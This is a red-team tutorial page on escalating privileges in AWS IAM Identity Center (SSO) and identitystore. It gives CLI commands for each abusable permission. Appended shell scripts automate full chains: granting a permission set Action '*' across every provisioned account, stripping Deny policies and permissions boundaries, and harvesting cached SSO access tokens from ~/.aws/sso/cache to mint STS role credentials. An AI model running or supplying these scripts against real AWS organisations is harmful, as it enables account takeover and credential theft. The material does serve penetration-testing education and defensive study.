AWS - SSO & identitystore Privesc


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

AWS Identity Center / AWS SSO

For more information about AWS Identity Center / AWS SSO check:

AWS - IAM, Identity Center & SSO Enum

warning

Note that by default, only principals with permissions in the management account can access and manage IAM Identity Center.
Principals from another account can only do so if that account has been registered as a delegated administrator for Identity Center.
Check the docs for more info.

Reset Password

An easy way to escalate privileges in a setup like this would be a permission that lets you reset other users' passwords. Unfortunately there is no identitystore/sso-admin API for it: the reset is only available from the Identity Center console, where the administrator either sends the user an email with reset instructions or generates a one-time password. So you need console access to Identity Center as an administrator, and with the email option you would also need access to the user's mailbox.

identitystore:CreateGroupMembership

With this permission it's possible to add a user to a group, so the user inherits every account assignment (and therefore every permission set) the group has. No re-provisioning is needed: the group's assignments already exist in the target accounts, and the new member simply starts matching them.

```bash
aws identitystore create-group-membership --identity-store-id <store-id> --group-id <group-id> --member-id UserId=<user-id>
```

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with these permissions can add an inline policy to a permission set that is assigned to a principal under their control, and then re-provision the permission set so the IAM role backing it in every target account picks up the new policy.

```bash
# Content of /tmp/policy.json (an inline policy is a JSON document)
cat > /tmp/policy.json <<'EOF'
{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "Statement1",
			"Effect": "Allow",
			"Action": ["*"],
			"Resource": ["*"]
		}
	]
}
EOF

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.json

# Re-provision so the updated policy is pushed to every account where the permission set is deployed
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with these permissions can attach an AWS managed policy (for example AdministratorAccess) to a permission set that is assigned to a principal under their control, and then re-provision it so the change reaches the target accounts.

```bash
# Attach the AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Re-provision so the updated policy is pushed to every account where the permission set is deployed
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

An attacker with these permissions can attach a reference to a customer managed IAM policy to a permission set that is assigned to a principal under their control, and then re-provision it so the change reaches the target accounts.

warning

To abuse this one you need to know the name (and path) of a customer managed IAM policy that already exists in ALL the accounts where the permission set is provisioned; the reference is resolved by name in each account, so provisioning fails for any account where that policy is missing.

```bash
# Attach a reference to an existing customer managed policy (resolved by Name and Path in each account)
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference Name=<customer-managed-policy-name>,Path=/

# Re-provision so the updated policy is pushed to every account where the permission set is deployed
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```
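The three permission-set variants above (inline policy, AWS managed policy, customer managed policy reference) share the same shape: change the set, then re-provision it. What the one-liners hide is that `provision-permission-set` is asynchronous and only returns a request id, and that `ALL_PROVISIONED_ACCOUNTS` touches every account where the set is already deployed. The script below is an added example, not code from the original page: it writes the admin inline policy, lists the accounts that will be affected, applies the change and polls `describe-permission-set-provisioning-status` until the job finishes. It assumes AWS CLI v2 with credentials holding sso:ListAccountsForProvisionedPermissionSet, sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet and sso:DescribePermissionSetProvisioningStatus; the `AWS_BIN` and `POLL_SECONDS` variables are my own additions so the CLI binary can be swapped for a stub.

```shell
# Added example (not from the original page): escalate an Identity Center
# permission set with a full-admin inline policy, then re-provision it and
# wait for the asynchronous provisioning job to finish.
# Assumes AWS CLI v2 and credentials with the sso:* permissions listed above.
# AWS_BIN lets the CLI binary be swapped (used for offline testing).
set -eu

awscli() { "${AWS_BIN:-aws}" "$@"; }

# Write the inline policy document the page uses (JSON, so name it .json).
write_admin_policy() {
  cat > "$1" <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Statement1",
      "Effect": "Allow",
      "Action": ["*"],
      "Resource": ["*"]
    }
  ]
}
EOF
}

# Accounts where the set is currently provisioned, i.e. the blast radius of
# provision-permission-set --target-type ALL_PROVISIONED_ACCOUNTS.
affected_accounts() {
  awscli sso-admin list-accounts-for-provisioned-permission-set \
    --instance-arn "$1" --permission-set-arn "$2" \
    --query 'AccountIds' --output text
}

# Provisioning is asynchronous: the call returns IN_PROGRESS plus a request id
# that must be polled until it reports SUCCEEDED or FAILED.
provision_and_wait() {
  instance="$1"; permset="$2"
  out=$(awscli sso-admin provision-permission-set \
    --instance-arn "$instance" --permission-set-arn "$permset" \
    --target-type ALL_PROVISIONED_ACCOUNTS \
    --query 'PermissionSetProvisioningStatus.[Status,RequestId]' --output text)
  status=${out%%[[:space:]]*}; req_id=${out##*[[:space:]]}
  while [ "$status" = "IN_PROGRESS" ]; do
    sleep "${POLL_SECONDS:-5}"
    status=$(awscli sso-admin describe-permission-set-provisioning-status \
      --instance-arn "$instance" --provision-permission-set-request-id "$req_id" \
      --query 'PermissionSetProvisioningStatus.Status' --output text)
  done
  echo "$status"
}

# Full chain; prints the final provisioning status (SUCCEEDED / FAILED).
escalate_permission_set() {
  instance="$1"; permset="$2"
  policy_file=$(mktemp)
  write_admin_policy "$policy_file"
  echo "accounts that will receive the new policy: $(affected_accounts "$instance" "$permset")" >&2
  awscli sso-admin put-inline-policy-to-permission-set \
    --instance-arn "$instance" --permission-set-arn "$permset" \
    --inline-policy "file://$policy_file" > /dev/null
  provision_and_wait "$instance" "$permset"
}

# Usage: escalate_permission_set <instance-arn> <perm-set-arn>
```

For the managed-policy variants only the `put-inline-policy-to-permission-set` call changes; the blast-radius check and the polling loop stay the same. A FAILED status carries a `FailureReason` in the same `describe-permission-set-provisioning-status` output, which is where a missing customer managed policy in one of the accounts shows up.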

sso:CreateAccountAssignment

An attacker with this permission can assign an existing permission set to a user or group under their control in a target account, which creates (or reuses) the corresponding IAM role in that account and lets the principal assume it through the access portal.

```bash
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
```

sso:GetRoleCredentials

Returns short-term STS credentials for a role (named after the permission set) that is assigned to the user in the given account.

```bash
aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>
```

The access token is the bearer token obtained through the Identity Center OIDC device-authorization flow, which is what `aws sso login` performs (`sso-oidc register-client`, `start-device-authorization` and `create-token`). The CLI caches it as JSON under `~/.aws/sso/cache/`, so this is not a privilege escalation by itself, but a token lifted from a compromised workstation can be used until it expires to call `aws sso list-accounts`, `aws sso list-account-roles` and `get-role-credentials` for every account and role assigned to that user, without needing their password or MFA.
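The two steps above (assign yourself a permission set, then turn an Identity Center session into role credentials) chain naturally. The script below is an added example, not code from the original page: it creates the account assignment and polls `describe-account-assignment-creation-status` until it completes, picks an unexpired token out of the CLI cache, and exchanges it for STS credentials of the assigned role. It assumes AWS CLI v2 with credentials holding sso:CreateAccountAssignment and sso:DescribeAccountAssignmentCreationStatus, and a cache directory in the format `aws sso login` writes (JSON files with `accessToken`, `expiresAt` and `region` fields); `AWS_BIN` and `POLL_SECONDS` are my own additions so the CLI binary can be swapped for a stub.

```shell
# Added example (not from the original page): give a principal you control a
# permission set in a target account, wait for the asynchronous assignment to
# finish, then turn a cached Identity Center access token into role credentials.
# Assumes AWS CLI v2 and a cache directory in the format `aws sso login` writes.
# AWS_BIN lets the CLI binary be swapped (used for offline testing).
set -eu

awscli() { "${AWS_BIN:-aws}" "$@"; }

# CreateAccountAssignment is asynchronous: poll until SUCCEEDED or FAILED.
assign_and_wait() {
  instance="$1"; account="$2"; permset="$3"; principal_type="$4"; principal_id="$5"
  out=$(awscli sso-admin create-account-assignment \
    --instance-arn "$instance" --target-id "$account" --target-type AWS_ACCOUNT \
    --permission-set-arn "$permset" --principal-type "$principal_type" --principal-id "$principal_id" \
    --query 'AccountAssignmentCreationStatus.[Status,RequestId]' --output text)
  status=${out%%[[:space:]]*}; req_id=${out##*[[:space:]]}
  while [ "$status" = "IN_PROGRESS" ]; do
    sleep "${POLL_SECONDS:-5}"
    status=$(awscli sso-admin describe-account-assignment-creation-status \
      --instance-arn "$instance" --account-assignment-creation-request-id "$req_id" \
      --query 'AccountAssignmentCreationStatus.Status' --output text)
  done
  echo "$status"
}

# Extract a string field from a one-line-per-key JSON file (enough for the CLI cache).
json_field() { sed -n "s/.*\"$1\" *: *\"\([^\"]*\)\".*/\1/p" "$2" | head -n 1; }

# Pick the first unexpired token in the cache; sets SSO_TOKEN and SSO_REGION.
sso_cached_token() {
  cache_dir="${1:-$HOME/.aws/sso/cache}"
  now=$(date -u +%Y-%m-%dT%H:%M:%SZ)
  for f in "$cache_dir"/*.json; do
    [ -f "$f" ] || continue
    token=$(json_field accessToken "$f")
    [ -n "$token" ] || continue
    # expiresAt is an ISO-8601 UTC timestamp, so a plain string comparison orders it.
    if expr "$(json_field expiresAt "$f")" \> "$now" > /dev/null; then
      SSO_TOKEN="$token"; SSO_REGION=$(json_field region "$f")
      return 0
    fi
  done
  return 1
}

# Exchange the token for STS credentials of an assigned role and export them.
sso_role_creds() {
  account="$1"; role="$2"
  out=$(awscli sso get-role-credentials --region "$SSO_REGION" --access-token "$SSO_TOKEN" \
    --account-id "$account" --role-name "$role" \
    --query 'roleCredentials.[accessKeyId,secretAccessKey,sessionToken]' --output text)
  AWS_ACCESS_KEY_ID=${out%%[[:space:]]*}
  rest=${out#*[[:space:]]}
  AWS_SECRET_ACCESS_KEY=${rest%%[[:space:]]*}
  AWS_SESSION_TOKEN=${rest#*[[:space:]]}
  export AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN
}

# Usage:
#   assign_and_wait <instance-arn> <account-id> <perm-set-arn> USER <user-id>
#   sso_cached_token && sso_role_creds <account-id> <permission-set-name>
#   aws sts get-caller-identity
```

The role name passed to `get-role-credentials` is the permission set name, not an ARN. The cache lookup deliberately ignores expired entries; if none is valid the function returns 1 and the user needs to log in again, which is the point at which MFA can get in the way.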

sso:DetachManagedPolicyFromPermissionSet

An attacker with this permission can detach an AWS managed policy from a permission set. If the detached policy is one that restricts the set (for example a guardrail built from Deny statements), removing it widens the effective permissions of every principal assigned that set. The change only reaches the target accounts once the permission set is re-provisioned (sso:ProvisionPermissionSet).

```bash
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
```

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

An attacker with this permission can detach a customer managed policy reference from a permission set. As with AWS managed policies, if the referenced policy is the one carrying the Deny statements that constrain the set, detaching it widens the effective permissions. The change only reaches the target accounts once the permission set is re-provisioned (sso:ProvisionPermissionSet).

```bash
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference Name=<policy-name>,Path=/
```

sso:DeleteInlinePolicyFromPermissionSet

An attacker with this permission can delete the inline policy of a permission set. If that inline policy is where the Deny statements live, deleting it widens the effective permissions (note that any Allow statements it contained are lost too). The change only reaches the target accounts once the permission set is re-provisioned (sso:ProvisionPermissionSet).

```bash
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
```

sso:DeletePermissionsBoundaryFromPermissionSet

An attacker with this permission can remove the permissions boundary from a permission set. Since the boundary caps what the set's policies can grant, removing it lifts that cap and lets the attached policies apply in full. The change only reaches the target accounts once the permission set is re-provisioned (sso:ProvisionPermissionSet).

```bash
aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
```
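The four removal primitives above only help if what you remove is actually what restricts the set, and none of them takes effect in the accounts until the set is re-provisioned. The script below is an added example, not code from the original page: it inspects a permission set, reports the attached managed and customer managed policies for manual review, removes only the inline policy (when it carries Deny statements) and the permissions boundary, and kicks off provisioning. It assumes AWS CLI v2 with credentials holding the matching sso:Get*/List*, sso:DeleteInlinePolicyFromPermissionSet, sso:DeletePermissionsBoundaryFromPermissionSet and sso:ProvisionPermissionSet permissions; `AWS_BIN` is my own addition so the CLI binary can be swapped for a stub.

```shell
# Added example (not from the original page): before detaching anything from a
# permission set, enumerate what restricts it, remove only the pieces that
# narrow it (an inline policy with Deny statements, the permissions boundary),
# and re-provision so the change reaches the target accounts.
# Assumes AWS CLI v2 and the sso:* permissions listed above.
# AWS_BIN lets the CLI binary be swapped (used for offline testing).
set -eu

awscli() { "${AWS_BIN:-aws}" "$@"; }

# Print the inline policy document, or nothing if the set has none.
inline_policy() {
  awscli sso-admin get-inline-policy-for-permission-set \
    --instance-arn "$1" --permission-set-arn "$2" --query 'InlinePolicy' --output text
}

# Exit 0 if the inline policy contains at least one Deny statement, 1 otherwise.
inline_policy_has_deny() {
  inline_policy "$1" "$2" | grep -Eq '"Effect" *: *"Deny"'
}

# Managed and customer managed policies need their content reviewed before
# detaching (that needs iam:GetPolicyVersion in each account); just list them.
list_attached_policies() {
  awscli sso-admin list-managed-policies-in-permission-set \
    --instance-arn "$1" --permission-set-arn "$2" \
    --query 'AttachedManagedPolicies[].Arn' --output text
  awscli sso-admin list-customer-managed-policy-references-in-permission-set \
    --instance-arn "$1" --permission-set-arn "$2" \
    --query 'CustomerManagedPolicyReferences[].Name' --output text
}

# Exit 0 if a permissions boundary is set (the call fails when there is none).
has_permissions_boundary() {
  awscli sso-admin get-permissions-boundary-for-permission-set \
    --instance-arn "$1" --permission-set-arn "$2" > /dev/null 2>&1
}

# Remove the restricting pieces and push the result to all provisioned accounts.
# Prints what was removed (comma-separated) and the provisioning request id.
strip_restrictions() {
  instance="$1"; permset="$2"; removed=""
  if inline_policy_has_deny "$instance" "$permset"; then
    # Deletes the whole inline policy, Allow statements included.
    awscli sso-admin delete-inline-policy-from-permission-set \
      --instance-arn "$instance" --permission-set-arn "$permset" > /dev/null
    removed="${removed}inline-policy,"
  fi
  if has_permissions_boundary "$instance" "$permset"; then
    awscli sso-admin delete-permissions-boundary-from-permission-set \
      --instance-arn "$instance" --permission-set-arn "$permset" > /dev/null
    removed="${removed}permissions-boundary,"
  fi
  # Provisioning is asynchronous; poll describe-permission-set-provisioning-status
  # with this request id until it reports SUCCEEDED.
  req_id=$(awscli sso-admin provision-permission-set \
    --instance-arn "$instance" --permission-set-arn "$permset" \
    --target-type ALL_PROVISIONED_ACCOUNTS \
    --query 'PermissionSetProvisioningStatus.RequestId' --output text)
  echo "${removed%,} $req_id"
}

# Usage:
#   list_attached_policies <instance-arn> <perm-set-arn>
#   strip_restrictions <instance-arn> <perm-set-arn>
```

The Deny check is a plain text match on the policy document, which is enough for the CLI's JSON output; the managed policies are listed rather than detached because their effect depends on content the sso-admin API does not return.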
